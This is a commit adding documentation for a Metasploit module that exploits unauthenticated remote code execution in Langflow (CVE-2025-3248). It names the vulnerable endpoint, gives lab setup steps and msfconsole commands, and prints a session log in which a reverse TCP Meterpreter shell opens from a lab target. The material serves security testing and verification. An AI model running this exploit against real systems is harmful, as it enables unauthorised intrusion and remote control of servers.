Add Langflow unauth RCE module (CVE-2025-3248)

2025-04-11 14:07:54 +09:00
parent fc7688cc56
commit b613b0a41b
2 changed files with 180 additions and 0 deletions
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
+A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+
+The vulnerability affects:
+
+    * Langflow < 1.3.0
+
+This module was successfully tested on:
+
+    * Langflow 1.3.2 installed with Docker
+
+(Seems like if authentication is not enabled, version 1.3.2 is vulnerable.)
+
+
+### Installation
+1. `git clone https://github.com/langflow-ai/langflow.git`
+
+2. `cd langflow/docker_example`
+
+3. `docker compose up`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/langflow_unauth_rce_cve_2025_3248`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/langflow_unauth_rce_cve_2025_3248
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/langflow_unauth_rce_cve_2025_3248) > options
+
+Module options (exploit/linux/http/langflow_unauth_rce_cve_2025_3248):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    7860             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Python payload
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/langflow_unauth_rce_cve_2025_3248) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Version 1.3.2 detected
+[*] Sending stage (24772 bytes) to 192.168.56.16
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:39272) at 2025-04-11 13:47:47 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : c459aabb0d29
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```